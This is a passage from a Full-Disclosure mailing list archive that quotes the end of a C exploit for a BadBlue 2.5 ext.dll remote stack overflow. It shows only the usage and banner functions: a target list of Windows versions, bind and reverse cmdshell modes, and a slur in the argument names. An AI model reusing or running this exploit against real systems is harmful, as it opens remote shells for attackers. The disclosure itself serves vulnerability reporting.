size=2>> {</FONT> <BR><FONT size=2>> printf("USAGE:\n");</FONT>
<BR><FONT size=2>> printf(" [+] .
101_bblu.exe Target VulnIP (bind mode)\n");</FONT> <BR><FONT size=2>>
printf(" [+] . 101_bblu.exe Target VulnIP
VulnPORT (bind mode)\n");</FONT> <BR><FONT size=2>>
printf(" [+] . 101_bblu.exe Target VulnIP
VulnPORT GayIP GayPORT</FONT> <BR><FONT size=2>> (reverse mode)\n");</FONT>
<BR><FONT size=2>>
printf("TARGET: & \
nbsp; \
\n");</FONT> <BR><FONT size=2>>
printf(" [+] 1. Win2k SP4 Server
English (*)\n");</FONT> <BR><FONT size=2>>
printf(" [+] 1. Win2k SP4
Pro English (*)\n");</FONT> <BR><FONT size=2>>
printf(" [+] 1. Win2k SP-
-
- \n");</FONT> <BR><FONT
size=2>> printf(" [+] 2. WinXP
SP2 Pro. English \n");</FONT> <BR><FONT
size=2>> printf(" [+] 2. WinXP
SP1a Pro. English (*)\n");</FONT> <BR><FONT size=2>>
printf(" [+] 2. WinXP SP-
-
- \n");</FONT> <BR><FONT
size=2>> printf(" [+] 3. Win2k3
SP0 Server Italian (*)\n");</FONT> <BR><FONT size=2>>
printf(" [+] 3. Win2k3 SP-
-
- \n");</FONT> <BR><FONT
size=2>>
printf("NOTE: &nb \
sp; \
\n");</FONT> <BR><FONT size=2>>
printf(" The exploit bind a cmdshell port 101
or\n");</FONT> <BR><FONT size=2>>
printf(" reverse a cmdshell on your
listener.\n");</FONT> <BR><FONT size=2>>
printf(" A wildcard (*) mean tested working,
else, supposed</FONT> <BR><FONT size=2>> working.\n");</FONT> <BR><FONT
size=2>> printf(" A symbol
(-) mean all.\n");</FONT> <BR><FONT size=2>>
printf(" Compilation msvc6, cygwin,
Linux.\n");</FONT> <BR><FONT size=2>> return;</FONT> <BR><FONT
size=2>> }</FONT> <BR><FONT size=2>> void ver()</FONT> <BR><FONT
size=2>> {</FONT> <BR><FONT size=2>> printf("</FONT> <BR><FONT
size=2>> \n");</FONT> <BR><FONT size=2>> printf("</FONT> <BR><FONT
size=2>>
===================================================[0.1]=====\n");</FONT>
<BR><FONT size=2>> printf("
================BadBlue, Easy File Sharing</FONT> <BR><FONT size=2>>
2.5===============\n");</FONT> <BR><FONT size=2>>
printf(" ================ext.dll,
Remote Stack</FONT> <BR><FONT size=2>> Overflow===============\n");</FONT>
<BR><FONT size=2>> printf("
======coded by</FONT> <BR><FONT size=2>>
class101==================[Hat-Squad.com]=====\n");</FONT> <BR><FONT
size=2>> printf("
=====================================[class101.org</FONT> <BR><FONT
size=2>> 2005]=====\n");</FONT> <BR><FONT size=2>> printf("</FONT>
<BR><FONT size=2>> \n");</FONT> <BR><FONT size=2>> }</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>>
-------------------------------------------------------------</FONT> <BR><FONT
size=2>> class101</FONT> <BR><FONT size=2>> Jr. Researcher</FONT>
<BR><FONT size=2>> Hat-Squad.com</FONT> <BR><FONT size=2>>
-------------------------------------------------------------</FONT> <BR><FONT
size=2>> </FONT><BR><FONT size=2>>
_______________________________________________</FONT> <BR><FONT size=2>>
Full-Disclosure - We believe in it.</FONT> <BR><FONT size=2>> Charter: <A
href="http://lists.netsys.com/full-disclosure-charter.html"
target=_blank>http://lists.netsys.com/full-disclosure-charter.html</A></FONT>
<BR><FONT size=2>> </FONT></P><BR>
<P><FONT size=2>-- </FONT><BR><FONT size=2>Loco de aTar</FONT>
</P></BLOCKQUOTE></BODY></HTML>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic